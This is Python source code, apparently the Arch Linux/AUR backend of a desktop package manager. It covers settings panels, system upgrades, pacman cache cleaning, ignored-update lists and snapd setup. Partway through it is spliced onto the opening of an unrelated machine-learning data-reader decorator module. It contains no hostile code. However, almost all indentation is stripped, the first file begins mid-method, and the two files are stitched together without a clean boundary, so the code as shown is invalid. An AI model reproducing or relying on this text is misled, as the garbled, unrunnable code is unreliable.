aur_supported = (pkg and pkg.repository == 'aur') or aur.is_supported(arch_config)
if RefreshMirrors.should_synchronize(arch_config, aur_supported, self.logger):
return True
return SyncDatabases.should_sync(mirrors_refreshed=False, arch_config=arch_config,
aur_supported=aur_supported, logger=self.logger)
return action != SoftwareAction.SEARCH
def _start_category_task(self, taskman: TaskManager, create_config: CreateConfigFile, downloader: CategoriesDownloader):
taskman.update_progress('arch_aur_cats', 0, self.i18n['task.waiting_task'].format(bold(create_config.task_name)))
create_config.join()
arch_config = create_config.config
downloader.expiration = arch_config['categories_exp'] if isinstance(arch_config['categories_exp'], int) else None
taskman.update_progress('arch_aur_cats', 50, None)
def _finish_category_task(self, taskman: TaskManager):
taskman.update_progress('arch_aur_cats', 100, None)
taskman.finish_task('arch_aur_cats')
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
create_config = CreateConfigFile(taskman=task_manager, configman=self.configman, i18n=self.i18n,
task_icon_path=get_icon_path(), logger=self.logger)
create_config.start()
if internet_available:
self.index_aur = AURIndexUpdater(context=self.context, taskman=task_manager, create_config=create_config) # must always execute to properly determine the installed packages (even when AUR is disabled)
self.index_aur.start()
refresh_mirrors = RefreshMirrors(taskman=task_manager, i18n=self.i18n, root_password=root_password,
logger=self.logger, create_config=create_config)
refresh_mirrors.start()
SyncDatabases(taskman=task_manager, root_password=root_password, i18n=self.i18n,
logger=self.logger, refresh_mirrors=refresh_mirrors, create_config=create_config).start()
ArchCompilationOptimizer(i18n=self.i18n, logger=self.context.logger,
taskman=task_manager, create_config=create_config).start()
self.disk_cache_updater = ArchDiskCacheUpdater(taskman=task_manager,
i18n=self.i18n,
logger=self.context.logger,
controller=self,
internet_available=internet_available,
aur_indexer=self.index_aur,
create_config=create_config)
self.disk_cache_updater.start()
task_manager.register_task('arch_aur_cats', self.i18n['task.download_categories'], get_icon_path())
cat_download = CategoriesDownloader(id_='Arch', http_client=self.context.http_client,
logger=self.context.logger,
manager=self, url_categories_file=URL_CATEGORIES_FILE,
categories_path=CATEGORIES_FILE_PATH,
internet_connection=internet_available,
internet_checker=self.context.internet_checker,
after=lambda: self._finish_category_task(task_manager))
cat_download.before = lambda: self._start_category_task(taskman=task_manager, create_config=create_config,
downloader=cat_download)
cat_download.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
installed = self.read_installed(disk_loader=None, internet_available=internet_available).installed
aur_type, repo_type = self.i18n['gem.arch.type.aur.label'], self.i18n['gem.arch.type.arch_repo.label']
return [PackageUpdate(p.name, p.latest_version, aur_type if p.repository == 'aur' else repo_type, p.name) for p in installed if p.update and not p.is_update_ignored()]
def list_warnings(self, internet_available: bool) -> List[str]:
warnings = []
if self.arch_distro:
if not pacman.is_available():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('pacman')))
if not self._is_wget_available():
warnings.append(self.i18n['arch.warning.disabled'].format(bold('wget')))
if not git.is_installed():
warnings.append(self.i18n['arch.warning.git'].format(bold('git')))
return warnings
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
self.logger.info("Downloading suggestions file {}".format(SUGGESTIONS_FILE))
file = self.http_client.get(SUGGESTIONS_FILE)
if not file or not file.text:
self.logger.warning("No suggestion could be read from {}".format(SUGGESTIONS_FILE))
else:
self.logger.info("Mapping suggestions")
suggestions = {}
for l in file.text.split('\n'):
if l:
if limit <= 0 or len(suggestions) < limit:
lsplit = l.split('=')
name = lsplit[1].strip()
if not filter_installed or not pacman.check_installed(name):
suggestions[name] = SuggestionPriority(int(lsplit[0]))
api_res = self.aur_client.get_info(suggestions.keys())
if api_res:
res = []
for pkg in api_res:
if pkg.get('Name') in suggestions:
res.append(PackageSuggestion(self.aur_mapper.map_api_data(pkg, {}, self.categories), suggestions[pkg['Name']]))
self.logger.info("Mapped {} suggestions".format(len(suggestions)))
return res
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: ArchPackage):
if pkg.command:
subprocess.Popen(args=[pkg.command], shell=True, env={**os.environ})
def get_screenshots(self, pkg: SoftwarePackage) -> List[str]:
pass
def _gen_bool_selector(self, id_: str, label_key: str, tooltip_key: str, value: bool, max_width: int,
capitalize_label: bool = True, label_params: Optional[list] = None, tooltip_params: Optional[list] = None) -> SingleSelectComponent:
opts = [InputOption(label=self.i18n['yes'].capitalize(), value=True),
InputOption(label=self.i18n['no'].capitalize(), value=False)]
lb = self.i18n[label_key]
if label_params:
lb = lb.format(*label_params)
tip = self.i18n[tooltip_key]
if tooltip_params:
tip = tip.format(*tooltip_params)
return SingleSelectComponent(label=lb,
options=opts,
default_option=[o for o in opts if o.value == value][0],
max_per_line=len(opts),
type_=SelectViewType.RADIO,
tooltip=tip,
max_width=max_width,
id_=id_,
capitalize_label=capitalize_label)
def get_settings(self, screen_width: int, screen_height: int) -> ViewComponent:
arch_config = self.configman.get_config()
max_width = floor(screen_width * 0.25)
db_sync_start = self._gen_bool_selector(id_='sync_dbs_start',
label_key='arch.config.sync_dbs',
tooltip_key='arch.config.sync_dbs_start.tip',
value=bool(arch_config['sync_databases_startup']),
max_width=max_width)
db_sync_start.label += ' ({})'.format(self.i18n['initialization'].capitalize())
fields = [
self._gen_bool_selector(id_='repos',
label_key='arch.config.repos',
tooltip_key='arch.config.repos.tip',
value=bool(arch_config['repositories']),
max_width=max_width),
self._gen_bool_selector(id_='aur',
label_key='arch.config.aur',
tooltip_key='arch.config.aur.tip',
value=arch_config['aur'],
max_width=max_width,
capitalize_label=False),
self._gen_bool_selector(id_='opts',
label_key='arch.config.optimize',
tooltip_key='arch.config.optimize.tip',
value=bool(arch_config['optimize']),
label_params=['(AUR)'],
capitalize_label=False,
max_width=max_width),
self._gen_bool_selector(id_='rebuild_detector',
label_key='arch.config.aur_rebuild_detector',
tooltip_key='arch.config.aur_rebuild_detector.tip',
value=bool(arch_config['aur_rebuild_detector']),
label_params=['(AUR)'],
tooltip_params=["'rebuild-detector'"],
capitalize_label=False,
max_width=max_width),
self._gen_bool_selector(id_='rebuild_detector_no_bin',
label_key='arch.config.aur_rebuild_detector_no_bin',
label_params=['rebuild-detector'],
tooltip_key='arch.config.aur_rebuild_detector_no_bin.tip',
tooltip_params=['rebuild-detector', self.i18n['arch.config.aur_rebuild_detector'].format('')],
value=bool(arch_config['aur_rebuild_detector_no_bin']),
capitalize_label=False,
max_width=max_width),
self._gen_bool_selector(id_='autoprovs',
label_key='arch.config.automatch_providers',
tooltip_key='arch.config.automatch_providers.tip',
value=bool(arch_config['automatch_providers']),
max_width=max_width),
self._gen_bool_selector(id_='check_dependency_breakage',
label_key='arch.config.check_dependency_breakage',
tooltip_key='arch.config.check_dependency_breakage.tip',
value=bool(arch_config['check_dependency_breakage']),
max_width=max_width),
self._gen_bool_selector(id_='mthread_download',
label_key='arch.config.pacman_mthread_download',
tooltip_key='arch.config.pacman_mthread_download.tip',
value=arch_config['repositories_mthread_download'],
max_width=max_width,
capitalize_label=True),
self._gen_bool_selector(id_='sync_dbs',
label_key='arch.config.sync_dbs',
tooltip_key='arch.config.sync_dbs.tip',
value=bool(arch_config['sync_databases']),
max_width=max_width),
db_sync_start,
self._gen_bool_selector(id_='clean_cached',
label_key='arch.config.clean_cache',
tooltip_key='arch.config.clean_cache.tip',
value=bool(arch_config['clean_cached']),
max_width=max_width),
self._gen_bool_selector(id_='suggest_unneeded_uninstall',
label_key='arch.config.suggest_unneeded_uninstall',
tooltip_params=['"{}"'.format(self.i18n['arch.config.suggest_optdep_uninstall'])],
tooltip_key='arch.config.suggest_unneeded_uninstall.tip',
value=bool(arch_config['suggest_unneeded_uninstall']),
max_width=max_width),
self._gen_bool_selector(id_='suggest_optdep_uninstall',
label_key='arch.config.suggest_optdep_uninstall',
tooltip_key='arch.config.suggest_optdep_uninstall.tip',
value=bool(arch_config['suggest_optdep_uninstall']),
max_width=max_width),
self._gen_bool_selector(id_='ref_mirs',
label_key='arch.config.refresh_mirrors',
tooltip_key='arch.config.refresh_mirrors.tip',
value=bool(arch_config['refresh_mirrors_startup']),
max_width=max_width),
TextInputComponent(id_='mirrors_sort_limit',
label=self.i18n['arch.config.mirrors_sort_limit'],
tooltip=self.i18n['arch.config.mirrors_sort_limit.tip'],
only_int=True,
max_width=max_width,
value=arch_config['mirrors_sort_limit'] if isinstance(arch_config['mirrors_sort_limit'], int) else ''),
TextInputComponent(id_='aur_idx_exp',
label=self.i18n['arch.config.aur_idx_exp'] + ' (AUR)',
tooltip=self.i18n['arch.config.aur_idx_exp.tip'],
max_width=max_width,
only_int=True,
capitalize_label=False,
value=arch_config['aur_idx_exp'] if isinstance(arch_config['aur_idx_exp'], int) else ''),
new_select(id_='aur_build_only_chosen',
label=self.i18n['arch.config.aur_build_only_chosen'],
tip=self.i18n['arch.config.aur_build_only_chosen.tip'],
opts=[(self.i18n['yes'].capitalize(), True, None),
(self.i18n['no'].capitalize(), False, None),
(self.i18n['ask'].capitalize(), None, None),
],
value=arch_config['aur_build_only_chosen'],
max_width=max_width,
type_=SelectViewType.RADIO,
capitalize_label=False),
new_select(label=self.i18n['arch.config.edit_aur_pkgbuild'],
tip=self.i18n['arch.config.edit_aur_pkgbuild.tip'],
id_='edit_aur_pkgbuild',
opts=[(self.i18n['yes'].capitalize(), True, None),
(self.i18n['no'].capitalize(), False, None),
(self.i18n['ask'].capitalize(), None, None),
],
value=arch_config['edit_aur_pkgbuild'],
max_width=max_width,
type_=SelectViewType.RADIO,
capitalize_label=False),
self._gen_bool_selector(id_='aur_remove_build_dir',
label_key='arch.config.aur_remove_build_dir',
tooltip_key='arch.config.aur_remove_build_dir.tip',
value=bool(arch_config['aur_remove_build_dir']),
max_width=max_width,
capitalize_label=False),
FileChooserComponent(id_='aur_build_dir',
label=self.i18n['arch.config.aur_build_dir'],
tooltip=self.i18n['arch.config.aur_build_dir.tip'].format(BUILD_DIR),
max_width=max_width,
file_path=arch_config['aur_build_dir'],
capitalize_label=False,
directory=True),
TextInputComponent(id_='arch_cats_exp',
label=self.i18n['arch.config.categories_exp'],
tooltip=self.i18n['arch.config.categories_exp.tip'],
max_width=max_width,
only_int=True,
capitalize_label=False,
value=arch_config['categories_exp'] if isinstance(arch_config['categories_exp'], int) else ''),
]
return PanelComponent([FormComponent(fields, spaces=False, id_='root')])
def save_settings(self, component: PanelComponent) -> Tuple[bool, Optional[List[str]]]:
arch_config = self.configman.get_config()
form = component.get_form_component('root')
arch_config['repositories'] = form.get_single_select_component('repos').get_selected()
arch_config['optimize'] = form.get_single_select_component('opts').get_selected()
arch_config['aur_rebuild_detector'] = form.get_single_select_component('rebuild_detector').get_selected()
arch_config['aur_rebuild_detector_no_bin'] = form.get_single_select_component('rebuild_detector_no_bin').get_selected()
arch_config['sync_databases'] = form.get_single_select_component('sync_dbs').get_selected()
arch_config['sync_databases_startup'] = form.get_single_select_component('sync_dbs_start').get_selected()
arch_config['clean_cached'] = form.get_single_select_component('clean_cached').get_selected()
arch_config['refresh_mirrors_startup'] = form.get_single_select_component('ref_mirs').get_selected()
arch_config['mirrors_sort_limit'] = form.get_component('mirrors_sort_limit').get_int_value()
arch_config['repositories_mthread_download'] = form.get_component('mthread_download').get_selected()
arch_config['automatch_providers'] = form.get_single_select_component('autoprovs').get_selected()
arch_config['edit_aur_pkgbuild'] = form.get_single_select_component('edit_aur_pkgbuild').get_selected()
arch_config['aur_remove_build_dir'] = form.get_single_select_component('aur_remove_build_dir').get_selected()
arch_config['aur_build_dir'] = form.get_component('aur_build_dir').file_path
arch_config['aur_build_only_chosen'] = form.get_single_select_component('aur_build_only_chosen').get_selected()
arch_config['aur_idx_exp'] = form.get_component('aur_idx_exp').get_int_value()
arch_config['check_dependency_breakage'] = form.get_single_select_component('check_dependency_breakage').get_selected()
arch_config['suggest_optdep_uninstall'] = form.get_single_select_component('suggest_optdep_uninstall').get_selected()
arch_config['suggest_unneeded_uninstall'] = form.get_single_select_component('suggest_unneeded_uninstall').get_selected()
arch_config['categories_exp'] = form.get_component('arch_cats_exp').get_int_value()
if not arch_config['aur_build_dir']:
arch_config['aur_build_dir'] = None
aur_enabled_select = form.get_single_select_component('aur')
arch_config['aur'] = aur_enabled_select.get_selected()
if aur_enabled_select.changed() and arch_config['aur']:
self.index_aur = AURIndexUpdater(context=self.context, taskman=TaskManager(), arch_config=arch_config)
self.index_aur.start()
try:
self.configman.save_config(arch_config)
return True, None
except:
return False, [traceback.format_exc()]
def get_upgrade_requirements(self, pkgs: List[ArchPackage], root_password: str, watcher: ProcessWatcher) -> UpgradeRequirements:
self.aur_client.clean_caches()
arch_config = self.configman.get_config()
aur_supported = aur.is_supported(arch_config)
self._sync_databases(arch_config=arch_config, aur_supported=aur_supported,
root_password=root_password, handler=ProcessHandler(watcher), change_substatus=False)
summarizer = UpdatesSummarizer(aur_client=self.aur_client,
aur_supported=aur_supported,
i18n=self.i18n,
logger=self.logger,
deps_analyser=self.deps_analyser,
watcher=watcher)
try:
return summarizer.summarize(pkgs, root_password, arch_config)
except PackageNotFoundException:
pass # when nothing is returned, the upgrade is called off by the UI
def get_custom_actions(self) -> List[CustomSoftwareAction]:
actions = []
arch_config = self.configman.get_config()
if pacman.is_mirrors_available():
actions.append(self.custom_actions['ref_mirrors'])
actions.append(self.custom_actions['ref_dbs'])
actions.append(self.custom_actions['clean_cache'])
if bool(arch_config['repositories']):
actions.append(self.custom_actions['sys_up'])
if pacman.is_snapd_installed():
actions.append(self.custom_actions['setup_snapd'])
return actions
def fill_sizes(self, pkgs: List[ArchPackage]):
installed, new, all_names, installed_names = [], [], [], []
for p in pkgs:
if p.repository != 'aur':
all_names.append(p.name)
if p.installed:
installed.append(p)
installed_names.append(p.name)
else:
new.append(p)
new_sizes = pacman.map_update_sizes(all_names)
if new_sizes:
if new:
for p in new:
p.size = new_sizes.get(p.name)
if installed:
installed_sizes = pacman.get_installed_size(installed_names)
for p in installed:
p.size = installed_sizes.get(p.name)
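                    # p.size currently holds the installed size; below it becomes the size
                    # delta of the update (download size minus installed size) when both are
                    # known, or just the download size when the installed size is missing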
new_size = new_sizes.get(p.name)
if p.size is None:
p.size = new_size
elif new_size is not None:
p.size = new_size - p.size
def upgrade_system(self, root_password: str, watcher: ProcessWatcher) -> bool:
# repo_map = pacman.map_repositories()
net_available = self.context.internet_checker.is_available()
installed = self.read_installed(limit=-1, only_apps=False, pkg_types=None, internet_available=net_available, disk_loader=None).installed
if not installed:
watcher.show_message(title=self.i18n['arch.custom_action.upgrade_system'],
body=self.i18n['arch.custom_action.upgrade_system.no_updates'],
type_=MessageType.INFO)
return False
to_update = [p for p in installed if p.repository != 'aur' and p.update]
if not to_update:
watcher.show_message(title=self.i18n['arch.custom_action.upgrade_system'],
body=self.i18n['arch.custom_action.upgrade_system.no_updates'],
type_=MessageType.INFO)
return False
# icon_path = get_repo_icon_path()
# pkg_opts, size = [], 0
# self.fill_sizes(to_update)
#
# for pkg in to_update:
# lb = '{} ( {} > {} ) - {}: {}'.format(pkg.name,
# pkg.version,
# pkg.latest_version,
# self.i18n['size'].capitalize(),
# '?' if pkg.size is None else get_human_size_str(pkg.size))
# pkg_opts.append(InputOption(label=lb,
# value=pkg.name,
# read_only=True,
# icon_path=icon_path))
#
# if pkg.size is not None:
# size += pkg.size
#
# pkg_opts.sort(key=lambda o: o.label)
# select = MultipleSelectComponent(label='',
# options=pkg_opts,
# default_options=set(pkg_opts))
# if watcher.request_confirmation(title=self.i18n['arch.custom_action.upgrade_system'],
# body="{}. {}: {}".format(self.i18n['arch.custom_action.upgrade_system.pkgs'],
# self.i18n['size'].capitalize(),
# get_human_size_str(size)),
# confirmation_label=self.i18n['proceed'].capitalize(),
# deny_label=self.i18n['cancel'].capitalize(),
# components=[select]):
# watcher.change_substatus(self.i18n['arch.custom_action.upgrade_system.substatus'])
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
success, output = handler.handle_simple(pacman.upgrade_system(root_password))
if not success or 'error:' in output:
watcher.show_message(title=self.i18n['arch.custom_action.upgrade_system'],
body="An error occurred during the upgrade process. Check out the {}".format(
bold('Details')),
type_=MessageType.ERROR)
return False
else:
database.register_sync(self.logger)
            msg = '<p>{}</p><br/><p>{}</p><p>{}</p>'.format(self.i18n['action.update.success.reboot.line1'],
self.i18n['action.update.success.reboot.line2'],
self.i18n['action.update.success.reboot.line3'])
watcher.request_reboot(msg)
return True
def clean_cache(self, root_password: str, watcher: ProcessWatcher) -> bool:
cache_dir = pacman.get_cache_dir()
if not cache_dir or not os.path.isdir(cache_dir):
watcher.show_message(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
                                 body=self.i18n['arch.custom_action.clean_cache.no_dir'].capitalize().format(bold(cache_dir)),
type_=MessageType.WARNING)
return True
text = '<p>{}.</p><p>{}.</p><p>{}.</p>'.format(self.i18n['arch.custom_action.clean_cache.msg1'],
self.i18n['arch.custom_action.clean_cache.msg2'],
self.i18n['arch.custom_action.clean_cache.msg3'])
if watcher.request_confirmation(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=text,
confirmation_label=self.i18n['clean'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
handler = ProcessHandler(watcher)
rm = SimpleProcess(cmd=['rm', '-rf', cache_dir], root_password=root_password)
success, _ = handler.handle_simple(rm)
if success:
watcher.show_message(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=self.i18n['arch.custom_action.clean_cache.success'],
type_=MessageType.INFO)
mkcache = SimpleProcess(cmd=['mkdir', '-p', cache_dir], root_password=root_password)
handler.handle_simple(mkcache)
return True
else:
watcher.show_message(title=self.i18n['arch.custom_action.clean_cache'].capitalize(),
body=self.i18n['arch.custom_action.clean_cache.fail'],
type_=MessageType.ERROR)
return False
return True
def _list_ignored_updates(self) -> Set[str]:
ignored = set()
if os.path.exists(UPDATES_IGNORED_FILE):
with open(UPDATES_IGNORED_FILE) as f:
ignored_lines = f.readlines()
for line in ignored_lines:
if line:
line_clean = line.strip()
if line_clean:
ignored.add(line_clean)
return ignored
def _write_ignored(self, names: Set[str]):
Path(CONFIG_DIR).mkdir(parents=True, exist_ok=True)
ignored_list = [*names]
ignored_list.sort()
with open(UPDATES_IGNORED_FILE, 'w+') as f:
if ignored_list:
for pkg in ignored_list:
f.write('{}\n'.format(pkg))
else:
f.write('')
def ignore_update(self, pkg: ArchPackage):
ignored = self._list_ignored_updates()
if pkg.name not in ignored:
ignored.add(pkg.name)
self._write_ignored(ignored)
pkg.update_ignored = True
def _revert_ignored_updates(self, pkgs: Iterable[str]):
ignored = self._list_ignored_updates()
for p in pkgs:
if p in ignored:
ignored.remove(p)
self._write_ignored(ignored)
def revert_ignored_update(self, pkg: ArchPackage):
self._revert_ignored_updates({pkg.name})
pkg.update_ignored = False
def _add_as_editable_pkgbuild(self, pkgname: str):
try:
Path('/'.join(EDITABLE_PKGBUILDS_FILE.split('/')[0:-1])).mkdir(parents=True, exist_ok=True)
editable = self._read_editable_pkgbuilds()
if pkgname not in editable:
editable.add(pkgname)
self._write_editable_pkgbuilds(editable)
return True
except:
traceback.print_exc()
return False
def _write_editable_pkgbuilds(self, editable: Set[str]):
if editable:
with open(EDITABLE_PKGBUILDS_FILE, 'w+') as f:
for name in sorted([*editable]):
f.write('{}\n'.format(name))
else:
os.remove(EDITABLE_PKGBUILDS_FILE)
def _remove_from_editable_pkgbuilds(self, pkgname: str):
if os.path.exists(EDITABLE_PKGBUILDS_FILE):
try:
editable = self._read_editable_pkgbuilds()
if pkgname in editable:
editable.remove(pkgname)
self._write_editable_pkgbuilds(editable)
except:
traceback.print_exc()
return False
return True
def _read_editable_pkgbuilds(self) -> Set[str]:
if os.path.exists(EDITABLE_PKGBUILDS_FILE):
with open(EDITABLE_PKGBUILDS_FILE) as f:
return {l.strip() for l in f.readlines() if l and l.strip()}
return set()
def enable_pkgbuild_edition(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher):
if self._add_as_editable_pkgbuild(pkg.name):
pkg.pkgbuild_editable = True
def disable_pkgbuild_edition(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher):
if self._remove_from_editable_pkgbuilds(pkg.name):
pkg.pkgbuild_editable = False
def setup_snapd(self, root_password: str, watcher: ProcessWatcher) -> bool:
# checking services
missing_items = []
for serv, active in system.check_enabled_services('snapd.service', 'snapd.socket').items():
if not active:
missing_items.append(InputOption(label=self.i18n['snap.custom_action.setup_snapd.service_disabled'].format("'{}'".format(serv)),
value='enable:{}'.format(serv),
read_only=True))
for serv, active in system.check_active_services('snapd.service', 'snapd.socket').items():
if not active:
missing_items.append(InputOption(label=self.i18n['snap.custom_action.setup_snapd.service_inactive'].format("'{}'".format(serv)),
value='start:{}'.format(serv),
read_only=True))
link = '/snap'
link_dest = '/var/lib/snapd/snap'
if not os.path.exists('/snap'):
missing_items.append(InputOption(label=self.i18n['snap.custom_action.setup_snapd.missing_link'].format("'{}'".format(link), "'{}'".format(link_dest)),
value='link:{}:{}'.format(link, link_dest),
read_only=True))
if missing_items:
actions = MultipleSelectComponent(label=self.i18n['snap.custom_action.setup_snapd.required_actions'],
options=missing_items,
default_options=set(missing_items),
max_per_line=1,
spaces=False)
if watcher.request_confirmation(title=self.i18n['confirmation'].capitalize(),
body='',
components=[actions],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
valid_pwd, pwd = watcher.request_root_password()
if valid_pwd:
handler = ProcessHandler(watcher)
for a in missing_items:
action = a.value.split(':')
if action[0] == 'enable':
msg = 'Enabling service {}'.format(action[1])
watcher.print(msg)
self.logger.info(msg)
proc = SimpleProcess(['systemctl', 'enable', '--now', action[1]], root_password=pwd)
elif action[0] == 'start':
msg = 'Starting service {}'.format(action[1])
watcher.print(msg)
self.logger.info(msg)
proc = SimpleProcess(['systemctl', 'start', action[1]], root_password=pwd)
elif action[0] == 'link':
msg = 'Creating symbolic link {} for {}'.format(action[1], action[2])
watcher.print(msg)
self.logger.info(msg)
proc = SimpleProcess(['ln', '-s', action[2], action[1]], root_password=pwd)
else:
msg = "Wrong action '{}'".format(action)
watcher.print(msg)
self.logger.warning(msg)
proc = None
if not proc:
return False
success, output = handler.handle_simple(proc)
if not success:
watcher.show_message(title=self.i18n['error'].capitalize(),
body=output,
type_=MessageType.ERROR)
return False
watcher.show_message(title=self.i18n['snap.custom_action.setup_snapd.ready'],
body=self.i18n['snap.custom_action.setup_snapd.ready.body'],
type_=MessageType.INFO)
return True
else:
watcher.show_message(title=self.i18n['snap.custom_action.setup_snapd.ready'],
body=self.i18n['snap.custom_action.setup_snapd.ready.body'],
type_=MessageType.INFO)
return True
def _gen_custom_pkgbuild_if_required(self, context: TransactionContext) -> Optional[str]:
build_only_chosen = context.config.get('aur_build_only_chosen')
pkgs_to_build = aur.map_srcinfo(string=self._read_srcinfo(context), pkgname=None, fields={'pkgname'}).get('pkgname')
if isinstance(pkgs_to_build, str):
pkgs_to_build = {pkgs_to_build}
else:
pkgs_to_build = {*pkgs_to_build}
if build_only_chosen is False:
context.pkgs_to_build = pkgs_to_build
return
# checking if more than one package is mapped for this pkgbuild
if not pkgs_to_build or not isinstance(pkgs_to_build, set) or len(pkgs_to_build) == 1 or context.name not in pkgs_to_build:
context.pkgs_to_build = pkgs_to_build
return
if build_only_chosen is None:
if not context.dependency:
pkgnames = [InputOption(label=n, value=n, read_only=False) for n in pkgs_to_build if n != context.name]
select = MultipleSelectComponent(label='',
options=pkgnames,
default_options={*pkgnames},
max_per_line=1)
if not context.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.aur.sync.several_names.popup.body'].format(bold(context.name)) + ':',
components=[select],
confirmation_label=self.i18n['arch.aur.sync.several_names.popup.bt_only_chosen'].format(context.name),
deny_label=self.i18n['arch.aur.sync.several_names.popup.bt_selected']):
context.pkgs_to_build = {context.name, *select.get_selected_values()}
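            # rewrite the PKGBUILD's 'pkgname' declaration so makepkg only builds the
            # chosen packages, then regenerate the .SRCINFO from the customized PKGBUILD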
pkgbuild_path = '{}/PKGBUILD'.format(context.project_dir)
with open(pkgbuild_path) as f:
current_pkgbuild = f.read()
if context.pkgs_to_build:
names = '({})'.format(' '.join(("'{}'".format(p) for p in context.pkgs_to_build)))
else:
names = context.name
context.pkgs_to_build = {context.name}
new_pkgbuild = RE_PKGBUILD_PKGNAME.sub("pkgname={}".format(names), current_pkgbuild)
custom_pkgbuild_path = pkgbuild_path + '_CUSTOM'
with open(custom_pkgbuild_path, 'w+') as f:
f.write(new_pkgbuild)
new_srcinfo = makepkg.gen_srcinfo(context.project_dir, custom_pkgbuild_path)
with open('{}/.SRCINFO'.format(context.project_dir), 'w+') as f:
f.write(new_srcinfo)
return custom_pkgbuild_path
def _list_opt_deps_with_no_hard_requirements(self, source_pkgs: Set[str], installed_provided: Optional[Dict[str, Set[str]]] = None) -> Set[str]:
optdeps = set()
for deps in pacman.map_optional_deps(names=source_pkgs, remote=False).values():
optdeps.update(deps.keys())
res = set()
if optdeps:
all_provided = pacman.map_provided() if not installed_provided else installed_provided
real_optdeps = set()
for o in optdeps:
dep_providers = all_provided.get(o)
if dep_providers:
for p in dep_providers:
if p not in source_pkgs:
real_optdeps.add(p)
if real_optdeps:
for p in real_optdeps:
try:
reqs = pacman.list_hard_requirements(p, self.logger)
if reqs is not None and (not reqs or reqs.issubset(source_pkgs)):
res.add(p)
except PackageInHoldException:
self.logger.warning("There is a requirement in hold for opt dep '{}'".format(p))
continue
return res
def reinstall(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool: # only available for AUR packages
if not self.context.internet_checker.is_available():
raise NoInternetException()
self.aur_client.clean_caches()
apidatas = self.aur_client.get_info({pkg.name})
if not apidatas:
watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.action.reinstall.error.no_apidata'],
type_=MessageType.ERROR)
return False
self.aur_mapper.fill_last_modified(pkg, apidatas[0])
context = TransactionContext.gen_context_from(pkg=pkg,
arch_config=self.configman.get_config(),
root_password=root_password,
handler=ProcessHandler(watcher),
aur_supported=True)
context.skip_opt_deps = False
context.update_aur_index = True
return self.install(pkg=pkg,
root_password=root_password,
watcher=watcher,
context=context,
disk_loader=self.context.disk_loader_factory.new()).success
def set_rebuild_check(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
if pkg.repository != 'aur':
return False
try:
if pkg.allow_rebuild:
rebuild_detector.add_as_ignored(pkg.name)
pkg.allow_rebuild = False
else:
rebuild_detector.remove_from_ignored(pkg.name)
pkg.allow_rebuild = True
except:
self.logger.error("An unexpected exception happened")
traceback.print_exc()
return False
pkg.update_state()
return True
|
decorator.py | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'cache', 'map_readers', 'buffered', 'compose', 'chain', 'shuffle',
'ComposeNotAligned', 'firstn', 'xmap_readers', 'multiprocess_reader'
]
from threading import Thread
import subprocess
import multiprocessing
import six
import sys
from six.moves.queue import Queue
from six.moves import zip_longest
from six.moves import map
from six.moves import zip
import itertools
import random
import zlib
import paddle.compat as cpt
def cache(reader):
"""
Cache the reader data into memory.
    Be careful that this method may take a long time to process
    and consume a lot of memory. :code:`reader()` is only
    called once.
Args:
reader (generator): a reader object which yields
data each time.
Returns:
generator: a decorated reader object which yields data from cached memory.
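    Examples:
        A minimal usage sketch (assuming this module is exposed as
        ``paddle.reader``, as in the other examples in this file):
        .. code-block:: python
            import paddle.reader
            def reader():
                for i in range(3):
                    yield i
            cached_reader = paddle.reader.cache(reader)
            for e in cached_reader():
                print(e)
            # the outputs are: 0 1 2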
"""
all_data = tuple(reader())
def __impl__():
for item in all_data:
yield item
return __impl__
def map_readers(func, *readers):
"""
Creates a data reader that outputs return value of function using
output of each data reader as arguments.
If input readers output the following data entries: 2 3,
and the input func is mul(x, y),
    the output of the resulting reader will be 6.
Args:
        func: a function to read data and compute the result; the output of this function
            will be set as the output of the resulting data reader.
readers (Reader|list of Reader): list of readers whose outputs will be used as arguments of func.
Returns:
        the resulting data reader (Reader)
Examples:
.. code-block:: python
import paddle.reader
d = {"h": 0, "i": 1}
def func(x):
return d[x]
def reader():
yield "h"
yield "i"
map_reader_result = paddle.reader.map_readers(func, reader)
"""
def reader():
rs = []
for r in readers:
rs.append(r())
for e in map(func, *rs):
yield e
return reader
def shuffle(reader, buf_size):
"""
paddle.fluid.io.shuffle ( :ref:`api_fluid_io_shuffle` ) is recommended to use,
and paddle.reader.shuffle is an alias.
This API creates a decorated reader that outputs the shuffled data.
The output data from the origin reader will be saved into a buffer,
and then shuffle the data. The size of buffer is determined by argument buf_size.
Args:
reader(callable): the original reader whose data will be shuffled.
buf_size(int): the size of shuffled buffer.
Returns:
callable: a decorated reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
def reader():
for i in range(5):
yield i
shuffled_reader = fluid.io.shuffle(reader, 3)
for e in shuffled_reader():
print(e)
# outputs are 0~4 unordered arrangement
"""
def data_reader():
buf = []
for e in reader():
buf.append(e)
if len(buf) >= buf_size:
random.shuffle(buf)
for b in buf:
yield b
buf = []
if len(buf) > 0:
random.shuffle(buf)
for b in buf:
yield b
return data_reader
def chain(*readers):
"""
    Use the input data readers to create a chained data reader. The newly created reader
chains the outputs of input readers together as its output.
**Note**:
``paddle.reader.chain`` is the alias of ``paddle.fluid.io.chain``, and
``paddle.fluid.io.chain`` is recommended to use.
